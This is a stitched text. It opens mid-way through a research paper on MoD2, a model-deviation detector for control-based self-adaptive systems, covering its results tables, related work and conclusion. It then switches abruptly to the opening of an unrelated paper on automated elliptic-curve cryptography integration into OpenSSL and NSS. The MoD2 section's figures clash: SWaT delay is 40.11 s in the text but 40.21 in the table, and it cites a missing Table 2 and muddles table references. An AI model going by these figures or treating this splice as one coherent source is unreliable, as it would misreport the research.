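    return cfg.para_d, cfg.env_d   # deviation injected at time t

positive = Config(env_i=1.0, env_d=1.4, para_i=2.0, para_d=2.6, t=300)
negative = Config(env_i=1.0, env_d=1.0, para_i=2.0, para_d=2.0, t=300)
print(is_negative(positive), is_negative(negative))  # → False True
```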
Notice that a positive configuration may never violate any control property: as we discussed in Section 2, model deviation is a necessary condition, not a sufficient one, for the system’s abnormal behavior. 5.1.3 Evaluation criteria. We measure timeliness by the mean time delay (MTD, i.e., the average interval between the deviation point and the detection point of a positive configuration). Notice that we only consider the correctly-detected positive configurations in MTD. We measure accuracy by the false-negative rate (FN rate, i.e., the percentage of positive configurations that are falsely detected to be negative) and the false-positive rate (FP rate, i.e., the percentage of negative configurations that are falsely detected to be positive). Notice that each positive configuration can be divided into a negative part (i.e., the execution before the time point of model deviation) and a positive part (i.e., the execution after it). FP also accounts for the positive configurations that are falsely detected in their negative parts. 5.1.4 Experiment procedure. We conducted all the experiments on an ECS server of Alibaba Cloud with 8 CPUs and 16GB of memory. To answer RQ1, we compare the three approaches’ achieved MTD, FN rate, and FP rate on different configuration sets. We first compare the performance of MoD2 against SWDetector on SWaT−, SWaT+, RUBiS−, RUBiS+, Encoder−, and Encoder+. We then compare the performance of MoD2, SWDetector, and LFM on SWaT+, since LFM is proposed to address the challenges of attack-induced abnormal behavior only. SWDetector is set with two different thresholds (θ = 3σ or θ = 6σ), which are two of the suggested settings in [53]. We also study the impact of system identification, which produces the identified values required by MoD2 (i.e., γ, W, V). We compare the performance of MoD2 with the values identified from different amounts of data (20–100%, step of 20%).
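The three criteria above can be computed mechanically from per-configuration records. A sketch (the record layout and numbers are invented for illustration) that also counts detections in a positive configuration's negative part as false positives, as described above; the choice of the total configuration count as the FP denominator is a simplification of ours:

```python
def evaluate(records):
    """Compute (MTD, FN rate, FP rate) from per-configuration records.

    Each record is (positive, deviation_t, reported, report_t); this layout
    is hypothetical, used only to illustrate the criteria's definitions.
    """
    delays, fn, fp = [], 0, 0
    n_pos = sum(1 for r in records if r[0])
    for positive, dev_t, reported, rep_t in records:
        if positive:
            if not reported:
                fn += 1                  # missed a real deviation
            elif rep_t < dev_t:
                fp += 1                  # fired during the negative part
            else:
                delays.append(rep_t - dev_t)
        elif reported:
            fp += 1                      # false alarm on a negative run
    mtd = sum(delays) / len(delays) if delays else 0.0
    return mtd, fn / max(n_pos, 1), fp / max(len(records), 1)

records = [
    (True, 100, True, 104),    # correct detection, 4 s delay
    (True, 100, False, None),  # false negative
    (False, None, False, None),
    (False, None, True, 50),   # false positive
]
mtd, fn_rate, fp_rate = evaluate(records)
print(mtd, fn_rate, fp_rate)  # → 4.0 0.5 0.25
```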
We measure usefulness by the positive configurations’ abnormal rate (i.e., the ratio of a subject system’s abnormal operation time to its suffered model deviation time). The abnormal operation time is measured as the time during which the subject system violates any control property (e.g., overshoot of the water level in SWaT) or fails to fulfill its mandatory requirements (e.g., overflow or underflow in SWaT). The model deviation time is measured as the subject system’s execution time after we inject model deviation. Notice that a positive configuration may never violate any control property: as we discussed in Section 2, model deviation is a necessary condition, not a sufficient one, for the system’s abnormal behavior. Figure 2: A case study on three positive configurations Table 3: Comparison of MoD2’s performance with different amounts of identification traces <table> <thead> <tr> <th></th> <th>SWaT⁻ &amp; SWaT⁺</th> <th>RUBiS⁻ &amp; RUBiS⁺</th> <th>Encoder⁻ &amp; Encoder⁺</th> </tr> </thead> <tbody> <tr> <td>identification error</td> <td>-2.5%, 3.8%</td> <td>-26.6%, 11.7%</td> <td>1.2%, 6.4%</td> </tr> <tr> <td>MTD(s)</td> <td>40.21</td> <td>0.00</td> <td>0.00</td> </tr> <tr> <td>FN(%)</td> <td>0.00</td> <td>0.00</td> <td>2.00</td> </tr> <tr> <td>FP(%)</td> <td>0.00</td> <td>0.30</td> <td>3.00</td> </tr> </tbody> </table> Table 4: Comparison of the abnormal rates w/ and w/o adaptation-supervision mechanisms <table> <thead> <tr> <th></th> <th>original</th> <th>MoD2-based</th> <th>SWDetector-based (θ=3σ)</th> <th>SWDetector-based (θ=6σ)</th> </tr> </thead> <tbody> <tr> <td>SWaT</td> <td>14.0% (162.45s)</td> <td>0.0% (0.00s)</td> <td>10.6% (114.35s)</td> <td>7.1% (71.32s)</td> </tr> <tr> <td>RUBiS</td> <td>61.1% (1953.00s)</td> <td>2.0% (60.00s)</td> <td>11.1% (398.10s)</td> <td>10.6% (386.40s)</td> </tr> <tr> <td>video encoder</td> <td>16.2% (2.92s)</td> <td>0.4% (0.08s)</td> <td>6.6% (1.19s)</td> <td>0.1% (0.02s)</td> </tr> </tbody> </table> Table 5:
Comparison results of MoD2, SWDetector and LFM (MTD on SWaT⁺) <table> <thead> <tr> <th></th> <th>MTD(s)</th> </tr> </thead> <tbody> <tr> <td>MoD2</td> <td>11.15</td> </tr> <tr> <td>LFM</td> <td>886.45</td> </tr> <tr> <td>SWDetector (θ=3σ)</td> <td>84.60</td> </tr> <tr> <td>SWDetector (θ=6σ)</td> <td>1.06</td> </tr> </tbody> </table> 5.2 Experiment Results RQ1 (effectiveness) Table 2 shows the performance of MoD2 and SWDetector for the three subjects. Considering detection timeliness, MoD2’s detection time for model deviation varies across subjects. The reported MTD is 40.11 seconds for SWaT and 0.00 seconds for both RUBiS and the video encoder. Compared with the SWDetectors, MoD2’s achieved MTD is 185.76s smaller on average across the subjects. We notice that the two SWDetectors report a similar detection delay for the video encoder subject. This is because our injected model deviation produces a severe change in the managed system’s output, which favors SWDetector’s monitoring of the output values. As for detection accuracy, MoD2 achieves good FN and FP rates in detecting model deviation. Generally, the average FN rate of MoD2 is 0.7% (0.0%–2.0%) and the average FP rate of MoD2 is 1.1% (0.0%–3.0%). For SWaT, the reported FN and FP rates are zero. For RUBiS, MoD2’s reported FN rate is zero and its FP rate is 0.3%, which is caused by the active detector. MoD2 reports a 2.0% FN rate and a 3.0% FP rate for the video encoder. This is caused by the difference between the selected initial estimate variance of the model parameter value and its true value. Compared with the SWDetectors under different settings, MoD2’s FN rate is 39.4% lower on average (−1.0%–100.0%), and its FP rate is 25.2% lower on average (−0.5%–93.3%). When SWDetector uses its best setting only (i.e., a window size of 28 and a threshold θ of 6σ), MoD2’s FN rate is still 33.5% lower on average (−1.0%–100.0%), and its FP rate is 1.6% lower on average (−0.5%–5.2%).
We notice that MoD2’s accuracy is slightly lower than SWDetector’s on the video encoder subject. In this subject, the injected model deviation immediately causes severe changes in the managed system’s output, which favors the sliding-window-based approach. MoD2 slightly sacrifices its accuracy in detecting such noticeable model deviations (a 1.0% higher FN rate and a 0.5% higher FP rate) in exchange for its accuracy in detecting covert model deviations (a 50.8% lower FN rate and a 2.7% lower FP rate). To answer RQ2, we compare the three subjects’ abnormal rates on different configuration sets with and without MoD2-based adaptation-supervision. We also implemented and evaluated two SWDetector-based adaptation-supervision mechanisms to study the role of our proposed MoD2. We measure the abnormal rate on SWaT⁺, RUBiS⁺, and Encoder⁺, respectively. Table 5 gives the experimental results on dataset SWaT⁺ (i.e., the positive configurations obtained by injecting attacks into the SWaT system). MoD2 outperforms the other three approaches (including the SWDetectors of different settings) in terms of detection timeliness and detection accuracy. MoD2 successfully detects all model deviations in a short time (11.15 seconds on average) with no false alarm. The learning-based LFM approach also achieves good detection accuracy. However, it requires a much longer time (886.45 seconds, 78.5 times longer than MoD2’s) to work. The reason for LFM’s large detection delay is that the accuracy of the trained classifier has to exceed a threshold of 85% to avoid false alarms. For SWDetector with the better setting (i.e., θ = 6σ), although it reports the shortest detection time (1.06 seconds) and no false alarm, it fails to detect 37.5% of the positive configurations, which is the worst among the compared approaches.
To better demonstrate MoD2’s effectiveness in detecting model deviation, we also perform a detailed study on the positive configurations for which the baseline approaches fail to give a timely and accurate detection. We list three of those positive configurations in Figure 2. The first and the third configurations are obtained by injecting network attacks into SWaT, and the second one is derived by injecting manipulation disturbance into SWaT’s valves. For each configuration, we list the measured output value y(k) (in the first line chart) and MoD2’s estimated parameter values B̂(k) (in the last two line charts, corresponding to the two entries of B̂(k)). We use differently marked lines to denote the time of model deviation injection, the time of MoD2’s detection, the time of SWDetector’s detection, the time of LFM’s detection, and the time at which abnormal behavior appeared. For the time of MoD2’s detection, we also mark it on the corresponding \( B_i(k) \)’s line chart, indicating which entry exceeds its safe region. For the first configuration, all three approaches successfully detect the model deviation. However, LFM requires a longer time since it has to gather multiple testing results to give an accurate detection. Such a high detection delay makes LFM’s detection infeasible since SWaT’s execution has already broken the control property (i.e., the stability property) by the time it reports. For the second configuration, SWDetector’s detection is too slow to be effective since the monitored output value shows no difference from a negative configuration in the early stages. For the third configuration, both SWDetector and LFM fail to detect the model deviation. Their missed detections are reasonable since this model deviation has not caused severe consequences in SWaT’s execution by the end of the execution trace.
However, according to [17], this model deviation will eventually cause SWaT’s abnormal behavior if the execution is prolonged from 30 minutes to 60 minutes. Table 3 compares MoD2’s performance with different amounts of traces for identification. We also list the variation of the identified values (i.e., identification error) used by MoD2. Generally, changing the amount of identification traces has a limited impact on MoD2’s effectiveness. The mean detection delay fluctuates in a small range (40.175–40.213 s for SWaT and 0.008–0.080 s for both RUBiS and video encoder) as the amount of identification traces changes. MoD2 with different amounts of identification traces reports exactly the same FN and FP rates. Table 3 thus reveals MoD2’s stable performance. In summary, MoD2 can detect model deviation with a low detection delay (15.37 s on average) and good accuracy (0.8% FN rate and 1.0% FP rate). Compared with the baseline approaches, MoD2 achieves a smaller detection delay (185.76 s or 93.3% smaller on average), as well as better accuracy (39.4% lower FN rate and 25.2% lower FP rate). RQ2 (usefulness) Table 4 compares the three subjects’ abnormal rates on different positive configuration sets under different adaptation-supervision mechanisms. For the subjects with our MoD2-based mechanism, the average abnormal rate is 1.2% (0.0%–2.0%). Compared with the subjects without our mechanism (denoted as original), the abnormal rates drop by 29.2% (14.0%–59.1%) on average. This result validates the usefulness of our approach in alleviating the impact of model deviation. In particular, our mechanism achieves a zero abnormal rate for the SWaT system (i.e., it prevents all model-deviation-caused severe consequences), while the abnormal rate without our mechanism is 14.0%. So even though SWaT’s optimal controllers are carefully designed and implemented by field experts, one cannot assume that the controllers’ robustness can handle all cases of model deviation [17].
We also list each subject’s abnormal operation time along with its abnormal rate. Without MoD2, each subject suffers 706.12 seconds of abnormal operation time per configuration on average. In other words, the corresponding control-SASs fail to provide any guarantees on the subject systems’ behavior for nearly 11.77 minutes. Notice that the aforementioned abnormal operation time could be even longer if model deviation were not appropriately addressed, since the executions we collected only last for 30 minutes. Compared with the two SWDetector-based mechanisms, the results reflect the importance of MoD2 in guarding the subjects’ adaptation. Specifically, the MoD2-based mechanism achieves a 6.5% lower abnormal rate (3.0%–8.9%), as well as 141.87 seconds shorter abnormal operation time. We believe that MoD2 is more effective in protecting control-SASs. The results in Table 4 also partly reflect the correctness of detecting model deviation based on estimated parameter values. The abnormal rate with supervision indicates the output abnormalities prevented by our detection (1.2% on average), which echoes the low FN rate of MoD2. The abnormal rate without supervision, showing that on average 30.4% of the experimental subjects’ execution time suffers abnormalities, would in turn imply the low FP rate of MoD2. In summary, our MoD2-based adaptation-supervision mechanism can alleviate the impact of model deviation on the managed system. With the support of our mechanism, the abnormal rate drops by 29.2% on average compared with the original control-SASs, and by 6.5% on average compared with the SWDetector-based mechanism. 5.3 Threats to Validity One major concern about the validity of our empirical conclusions is the selection of evaluation subjects. We only use three subjects as the managed systems, which might harm the generalizability of our conclusions.
A comprehensive evaluation requires a full understanding of the managed systems, as well as their suitable control theory-derived controllers. This requirement restricts our choice of possible experimental subjects. Nevertheless, we believe that our selected subjects are representative of different platforms (including network systems and cyber-physical systems) and architectures (including single controller and multiple controllers). Moreover, all of the selected subjects are widely used by other self-adaptation researchers as experimental subjects or motivating systems. Another concern is about injecting model deviations in the positive configurations. Since we cannot directly manipulate the subject system’s controllability features, we can only modify its parameters or inputs to simulate model deviation. This might make our experimental settings less realistic. To address this problem, we carefully design the injected model deviations. For SWaT, the model deviation is based on the reported physical abrasion [8] and network attacks [17]. For RUBiS, the model deviation is designed according to reported failures in web service systems [3]. And for the video encoder, we use real-world video streams to simulate the model deviation. 6 RELATED WORK Control theory has been widely exploited to implement self-adaptive systems for its theoretical guarantees. Some related works use control-theoretical techniques to refine the architecture-based system model of the managed system. For example, Checiu et al. use a server request model to describe the behavior of an adaptive web service system [15]. Filieri et al. use a discrete-time Markov chain model to depict service-oriented applications [22]. Others use control-theoretical techniques to guide the design of the managing system. Angelopoulos et al.
[4] propose the CobRA framework for designing self-adaptive web-services, which uses model predictive control to guide the adaptation strategy of the managing system. Gabriel et al. [54] combine control-SASs and traditional architecture-based SASs by introducing a discrete-time Markov chain into their PLA adaptation framework. Different from these works, the focus of MoD2 is not on designing the managing system but on providing self-adaptation assurances in the presence of model deviation. In other words, our work can be regarded as complementary to them, alerting their managing systems to the occurrence of model deviation. Model deviation has received the attention of self-adaptation researchers since control-SASs emerged. According to control theory, the precision of the nominal model in control-SASs directly determines the effectiveness of the derived managing systems. Baresi et al. propose using a grey-box discrete-time feedback controller to support robust self-adaptation that can overcome slight model deviation [11]. Filieri et al. use continuous learning mechanisms to keep the nominal model updated at runtime [24]. Maggio et al. use a Kalman filter to revise the identified nominal model by updating its state values [49]. Compared with these works, our MoD2-based mechanism concentrates on the model deviation that would cause the managing system to violate control properties, as well as the managed system to behave abnormally. Together with these works that address slight deviations of the model parameters, we can achieve model-deviation-free self-adaptation for control-SASs. The key component of our proposed mechanism is a timely and accurate detector for model deviation, which is similar to works on abnormal detection. Many research efforts have been devoted to abnormal detection in both the control theory community and the self-adaptation community.
The window-based approach is the most widely used abnormal detection approach in the control theory area [32], and is similar to the SWDetector approach compared in Section 5. Ozay et al. propose a set-membership approach to detect property violations occurring in the control system [33, 34]. Among self-adaptation researchers, Jiang et al. derive invariants for robotic systems by observing messages exchanged between system components [39]. Chen et al. propose an SVM-based method to detect network attacks on the SWaT system [17]. Qin et al. use context information to refine the derived invariants and combine multiple testing results to improve the accuracy of abnormal detection [57]. As we discussed in Section 2, the major difference between MoD2 and these approaches is that we directly estimate the values of the nominal model’s parameters instead of monitoring the system’s output values. By doing so, we reduce the delay of model deviation detection. Environmental uncertainty has always been a challenge for self-adaptation researchers. Most related works focus on uncertainty’s impact on the managed system’s state. Esfahani et al. identify internal and external uncertainty and propose a probability-based approach to address both the positive and negative consequences of uncertainty [20]. Ghezzi et al. propose an adaptation framework to manifest non-functional uncertainty via model-based development [28]. Angelopoulos et al. also use a Kalman filter to alleviate uncertainty’s impact on the estimated states of the managed system’s nominal model [4]. MoD2’s handling of uncertainty follows these works. However, the focus of MoD2 is on uncertainty’s impact on the nominal model’s parameters, which is addressed by our parameter deviation estimation technique. 7 CONCLUSION In this paper, we present an adaptation-supervision mechanism that adds a supervision loop to alleviate the impact of model deviation in control-SASs.
The key to our mechanism is a novel detector, MoD2, which combines several techniques, including parameter deviation estimation, uncertainty compensation, and safe region quantification, to balance the detector’s timeliness and accuracy. We conduct experiments to show the effectiveness of MoD2 and the usefulness of the MoD2-based adaptation-supervision mechanism. ACKNOWLEDGMENTS The authors would like to thank the anonymous reviewers for their comments. This work is supported by the Key-Area Research & Development Program of Guangdong Province (Grant #2020B010164003), the Natural Science Foundation of China (Grants #62025202, #61932021, #61902173), and the Natural Science Foundation of Jiangsu Province (Grant #BK20190299). REFERENCES
Set It and Forget It! Turnkey ECC for Instant Integration Dmitry Belyavsky Cryptocom Ltd. Moscow, Russian Federation beldmit@cryptocom.ru Billy Bob Brumley Tampere University Tampere, Finland billy.brumley@tuni.fi Jesús-Javier Chi-Domínguez Tampere University Tampere, Finland jesus.chidominguez@tuni.fi Luis Rivera-Zamarripa Tampere University Tampere, Finland luis.riverazamarripa@tuni.fi Igor Ustinov Cryptocom Ltd. Moscow, Russian Federation igus@cryptocom.ru ABSTRACT Historically, Elliptic Curve Cryptography (ECC) is an active field of applied cryptography where recent focus is on high speed, constant time, and formally verified implementations. While there are a handful of outliers where all these concepts join and land in real-world deployments, these are generally on a case-by-case basis: e.g. a library may feature such X25519 or P-256 code, but not for all curves. In this work, we propose and implement a methodology that fully automates the implementation, testing, and integration of ECC stacks with the above properties. We demonstrate the flexibility and applicability of our methodology by seamlessly integrating into three real-world projects: OpenSSL, Mozilla’s NSS, and the GOST OpenSSL Engine, achieving roughly 9.5x, 4.5x, 13.3x, and 3.7x speedup on any given curve for key generation, key agreement, signing, and verifying, respectively. Furthermore, we showcase the efficacy of our testing methodology by uncovering flaws and vulnerabilities in OpenSSL, and a specification-level vulnerability in a Russian standard. Our work bridges the gap between significant applied cryptography research results and deployed software, fully automating the process. KEYWORDS applied cryptography; public key cryptography; elliptic curve cryptography; software engineering; software testing; formal verification; GOST; NSS; OpenSSL. 
1 INTRODUCTION In 1976, Whitfield Diffie and Martin Hellman published the first key-exchange protocol [15] (based on Galois field arithmetic) that provides the capability for two different users to agree upon a shared secret between them. In 1985, Miller [32] and Koblitz [28] proposed public-key cryptosystems based on the group structure of an elliptic curve over Galois fields; from these works, an Elliptic Curve Diffie-Hellman (ECDH) variant arose. In 1994, Scott Vanstone proposed an Elliptic Curve Digital Signature Algorithm (ECDSA) variant (for more details see [25]). However, the main advantage of using Elliptic Curve Cryptography (ECC) is the smaller keys compared to the initial Galois field DH and DSA proposals. From the birth of ECC, which was focused on its mathematical description, the study, analysis, and improvement of elliptic curve arithmetic to achieve performant, constant-time, exception-free, and formally verified ECC implementations are clear research trends. Nevertheless, practice sometimes misaligns with theory, and by integrating theoretical works into real-world deployments, vulnerabilities arise and compromise the security of the given ECC scheme. Motivation. On the practice side, there is no shortage of examples of this misalignment. Brumley and Hakala [10] published the first (microarchitecture) timing attack on OpenSSL’s ECC implementation in 2009, with countermeasures by Käsper [27] and later Gueron and Krasnov [20]. But OpenSSL supports over 80 named curves, and these countermeasures cover only three: NIST curves P-224, P-256, and P-521, even later augmented with formal verification guarantees [35] after patching defects [31]. CVE-2018-5407 “PortSmash” [3] finally led to wider countermeasures [42] a decade later, but small leakage persists in the recent “LadderLeak” attack [4].
Still, even if current solutions hedge against timing attacks, the question of functional correctness remains: CVE-2011-1945 from [9] is the only real-world bug attack [8] we are aware of, deterministically recovering P-256 keys remotely by exploiting a carry propagation defect. BoringSSL approaches the constant time and functional correctness issues by narrowing features, only supporting P-224, P-256, and X25519, leveraging formal verification guarantees for Galois field arithmetic from Fiat [19]. Mozilla’s NSS approach is similar, removing support for the vast majority of curves—two of which (P-256, X25519) leverage the formal verification results from HACL* [43], while others still use generic legacy code with no protections or guarantees. Stripping support is not a viable option for full-featured libraries, OpenSSL being one example, but generally any project with even a slightly larger scope. How can these projects retain features yet provide constant-time and functional correctness confidence? Contributions. Our main contribution focuses on fully automatic implementation, testing, and integration of ECC stacks in real-world projects like OpenSSL, Mozilla’s NSS, and the GOST OpenSSL Engine. Our full-stack ECC implementations achieve about 9.5x, 4.5x, 13.3x, and 3.7x speedup for key generation, key agreement, signing, and verifying, respectively. Furthermore, our flexible and applicable proposal can be easily adapted to any curve model. To our knowledge, this is the first hybrid ECC implementation between short Weierstrass and Twisted Edwards curves that has been integrated into OpenSSL. Additionally, our methodology allowed us to find and fix subtle vulnerabilities in development versions of OpenSSL and in official Russian standards for cryptography.
2 BACKGROUND An elliptic curve $E_w$ defined over a Galois field $GF(p)$ is usually described by an equation of the form $$E_w: y^2 = x^3 + ax + b, \quad a, b \in GF(p)$$ (1) called a short Weierstrass curve. An affine point on the curve $E_w$ is a pair $(x, y)$ satisfying (1), but there is also a point at infinity denoted $O$, which plays the role of the neutral element on $E_w$. Additionally, given a positive integer $k$, point multiplication is the computation of $k$ times a given point $P$, denoted by $[k]P$. The order of a point $P$ on $E_w$ corresponds to the smallest positive integer $q$ such that $[q]P$ gives $O$. In our work, we assume the cardinality of $E_w$ is equal to $h \cdot q$ where $q$ is a prime number with $\lg(q) \approx \lg(p)$, and $h \in \{1, 4, 8\}$. When $4$ divides $h$, there is a Twisted Edwards curve $$E_t: eu^2 + v^2 = 1 + du^2v^2$$ (2) having the same cardinality, and each point on $E_w$ maps to $E_t$, and vice-versa, using the mappings $$(x, y) \mapsto (u, v) := \left(\frac{x - t}{y}, \frac{x - t - s}{x - t + s}\right)$$ (3) $$(u, v) \mapsto (x, y) := \left(\frac{s(1 + v)}{1 - v} + t, \frac{s(1 + v)}{(1 - v)u}\right)$$ (4) where $s = (e-d)/4 \mod p$, $t = (e+d)/6 \mod p$, $a = (s^2 - 3t^2) \mod p$, and $b = (2t^3 - ts^2) \mod p$. Projective points on the short Weierstrass curve. We choose to work with projective points $(X : Y : Z)$ satisfying $Y^2Z = X^3 + aXZ^2 + bZ^3$, where the affine point $(X/Z, Y/Z)$ belongs to $E_w$. Moreover, the projective representation of $O$ is $(0 : 1 : 0)$, which does not satisfy the affine curve equation of $E_w$. Because of the nature of the short Weierstrass curves, one needs to handle some exceptions when: (i) adding or doubling points with $O$; (ii) adding points $P$ and $Q$ when $P = \pm Q$. In particular, any mixed point addition takes as inputs a projective point and an affine point, which implies no exception-free implementation will be possible for this mixed point addition—$O$ has no affine representation!
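The correspondence in (3)-(4) can be sanity-checked numerically: with $s = (e-d)/4$, $t = (e+d)/6$, $a = s^2 - 3t^2$, and $b = 2t^3 - ts^2$, the map $(u,v) \mapsto (s(1+v)/(1-v) + t,\ s(1+v)/((1-v)u))$ sends affine Twisted Edwards points onto the short Weierstrass model. The prime $p$ and coefficients $e, d$ below are toy values chosen only so that the inverses exist; this is a sketch, not the paper's implementation.

```python
# Numeric sanity check of the Twisted Edwards <-> short Weierstrass
# correspondence (equations (2)-(4)), over a toy prime field.
p = 499          # toy prime (assumption, not from the paper)
e, d = 5, 3      # toy Twisted Edwards coefficients: e*u^2 + v^2 = 1 + d*u^2*v^2

def inv(n):
    return pow(n % p, p - 2, p)   # modular inverse, valid since p is prime

s = (e - d) * inv(4) % p
t = (e + d) * inv(6) % p
a = (s * s - 3 * t * t) % p       # short Weierstrass: y^2 = x^3 + a*x + b
b = (2 * t ** 3 - t * s * s) % p

def to_weierstrass(u, v):
    # Map (4): Edwards (u, v) -> Weierstrass (x, y)
    x = (s * (1 + v) * inv(1 - v) + t) % p
    y = s * (1 + v) * inv((1 - v) * u) % p
    return x, y

checked = 0
for u in range(1, p):             # u = 0 and v = 1 are the exceptional points
    for v in range(p):
        if v != 1 and (e * u * u + v * v - 1 - d * u * u * v * v) % p == 0:
            x, y = to_weierstrass(u, v)
            assert (y * y - x ** 3 - a * x - b) % p == 0
            checked += 1
```

Every non-exceptional affine point of the toy Edwards curve lands on the matching Weierstrass curve, confirming the coefficient relations term by term.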
Failure to use exception-free formulas could lead to successful exceptional procedure attacks [24], implying a possible break of ECC security. Still, apart from theoretical attacks there is the question of functional correctness. For example, CVE-2017-7781 affected Mozilla’s NSS, failing to account for the $P = \pm Q$ exceptions in textbook mixed Jacobian-affine point addition—a bug present in their codebase for over a decade. Projective points on the Twisted Edwards curve. To achieve efficient curve arithmetic, we choose to work with extended projective points $(X : Y : T : Z)$ satisfying $eX^2Z^2 + Y^2Z^2 = Z^4 + dX^2Y^2$, where the affine point $(X/Z, Y/Z)$ belongs to $E_t$ and $T = XY/Z$. The main advantage of using Twisted Edwards curves is the "cheap" exception-free formula for point addition; in particular, $(0 : 1 : 0 : 1)$ represents $O$ and corresponds to the affine point $(0, 1)$ on $E_t$. The main blocks of ECC cryptosystem implementations consist of (i) key generation, (ii) the key agreement procedure, and (iii) the digital signature algorithm. Key generation. Given an order-$q$ point $g$, the user randomly and uniformly chooses a secret key $\alpha$ from $[1, \ldots, q - 1]$ and computes the public key $P = [\alpha]g$. Key agreement with cofactor clearing. Assume the users Alice and Bob need to agree on a shared secret key; thus, Alice generates her private key $\alpha_A \in [1, \ldots, q - 1]$ and a public key $P_A = [\alpha_A]g$ by using the key generation block; similarly, Bob generates $\alpha_B$ and $P_B = [\alpha_B]g$. Next, Alice and Bob compute $s_{ab} = [h \cdot \alpha_A]P_B$ and $s_{ba} = [h \cdot \alpha_B]P_A$, respectively. Consequently, $s_{ab} = [h \cdot \alpha_A]P_B = [h \cdot \alpha_B \cdot \alpha_A]g = [h \cdot \alpha_B]P_A = s_{ba}$ is the shared secret key. The multiplication by $h$ is called cofactor clearing and ensures the protocol fails if $P_A$ or $P_B$ are adversarially chosen in the order-$h$ subgroup.
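The key agreement block above can be exercised on a toy curve. The following sketch uses the textbook curve $y^2 = x^3 + 2x + 2$ over $GF(17)$ with base point $g = (5, 1)$ of prime order $q = 19$ (so $h = 1$); the private keys are toy values, and the schoolbook double-and-add here is of course not constant time.

```python
# Toy cofactor-cleared key agreement: s_ab == s_ba on a textbook curve.
p, A = 17, 2                              # curve y^2 = x^3 + 2x + 2 over GF(17)
g, q, h = (5, 1), 19, 1                   # base point, prime order, cofactor

def add(P, Q):
    if P is None: return Q                # O is the neutral element
    if Q is None: return P
    (x1, y1), (x2, y2) = P, Q
    if x1 == x2 and (y1 + y2) % p == 0:
        return None                       # P + (-P) = O
    if P == Q:
        lam = (3 * x1 * x1 + A) * pow(2 * y1, -1, p) % p
    else:
        lam = (y2 - y1) * pow(x2 - x1, -1, p) % p
    x3 = (lam * lam - x1 - x2) % p
    return (x3, (lam * (x1 - x3) - y1) % p)

def mul(k, P):                            # double-and-add (not constant time!)
    R = None
    while k:
        if k & 1:
            R = add(R, P)
        P = add(P, P)
        k >>= 1
    return R

alpha_A, alpha_B = 3, 11                  # toy private keys in [1, q-1]
P_A, P_B = mul(alpha_A, g), mul(alpha_B, g)
s_ab = mul(h * alpha_A, P_B)              # Alice's side
s_ba = mul(h * alpha_B, P_A)              # Bob's side: both equal [h*a_A*a_B]g
```

Both sides arrive at the same point, matching the derivation $s_{ab} = [h \cdot \alpha_A \cdot \alpha_B]g = s_{ba}$.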
When $h = 1$, ECC CDH [1] and classical ECDH variants are equivalent. Digital signature algorithm (ECDSA). The user generates a private key $\alpha \in [1, \ldots, q - 1]$ and a public key $P = [\alpha]g$ by using the key generation block; using an approved hash function $\text{Hash}()$, the signature $(r, s)$ on message $m$ is computed by $$r = ([k]g)_x \mod q, \quad s = k^{-1}(\hat{m} + \alpha r) \mod q$$ (5) where $k$ is a nonce chosen uniformly from $[1, \ldots, q - 1]$, and $\hat{m}$ denotes the representation of $\text{Hash}(m)$ in $GF(q)$. The ECDSA signature successfully verifies if $u_1 = \hat{m} \cdot s^{-1} \mod q$ and $u_2 = r \cdot s^{-1} \mod q$ satisfy $$([u_1]g + [u_2]P)_x = r \mod q$$ (6) ECDSA is the ECC equivalent of DSA, which instead operates in the multiplicative group of a Galois field and pre-dates the ECDSA variant by at least a decade. Security. Mathematically speaking, the security of ECC relies on the hardness of computing an integer $k$ given $[k]P$, called the Elliptic Curve Discrete Logarithm Problem (ECDLP). In certain instances, the ECDLP can be solved using small-subgroup attacks [30] when the curve cardinality is smooth, and invalid-curve attacks [7] when the input point $P$ does not satisfy the curve equation. As a consequence, ECC implementations often seek to be secure against combined attacks that couple small-subgroup attacks with invalid-curve attacks using the twist curve $E'$ determined by the equation $y^2 = x^3 + ax - b$. The twist curve $E'$ has cardinality $h' \cdot q' = p + 1 + t_E$ where $h \cdot q = p + 1 - t_E$ is the cardinality of $E$ and $t_E$ is a curve constant (the Frobenius trace). A curve $E$ is twist secure if $h'$ is a small integer and $q' \approx p$ is a large prime number.
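Equations (5)-(6) can be run end-to-end on the same textbook toy curve $y^2 = x^3 + 2x + 2$ over $GF(17)$ with $g = (5,1)$ of order $q = 19$. The key, nonce, and digest values below are toy choices; a real implementation needs constant-time arithmetic, an approved hash, and a properly generated nonce.

```python
# Toy ECDSA signing (5) and verification (6) on a textbook curve.
p, A = 17, 2
g, q = (5, 1), 19

def add(P, Q):
    if P is None: return Q
    if Q is None: return P
    (x1, y1), (x2, y2) = P, Q
    if x1 == x2 and (y1 + y2) % p == 0:
        return None                      # P + (-P) = O
    if P == Q:
        lam = (3 * x1 * x1 + A) * pow(2 * y1, -1, p) % p
    else:
        lam = (y2 - y1) * pow(x2 - x1, -1, p) % p
    x3 = (lam * lam - x1 - x2) % p
    return (x3, (lam * (x1 - x3) - y1) % p)

def mul(k, P):                           # double-and-add (not constant time!)
    R = None
    while k:
        if k & 1:
            R = add(R, P)
        P = add(P, P)
        k >>= 1
    return R

def sign(alpha, m_hat, k):               # equation (5)
    r = mul(k, g)[0] % q
    s = pow(k, -1, q) * (m_hat + alpha * r) % q
    return r, s

def verify(P, m_hat, r, s):              # equation (6)
    u1 = m_hat * pow(s, -1, q) % q
    u2 = r * pow(s, -1, q) % q
    R = add(mul(u1, g), mul(u2, P))
    return R is not None and R[0] % q == r

alpha = 7                                # toy private key
P = mul(alpha, g)                        # public key [alpha]g
r, s = sign(alpha, m_hat=11, k=13)       # (r, s) = (16, 8)
ok_good = verify(P, 11, r, s)            # True: genuine signature
ok_bad = verify(P, 5, r, s)              # False: different digest
```

The negative case illustrates why positive-only testing is insufficient: a verifier that always returns true would pass the first check and silently pass the second.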
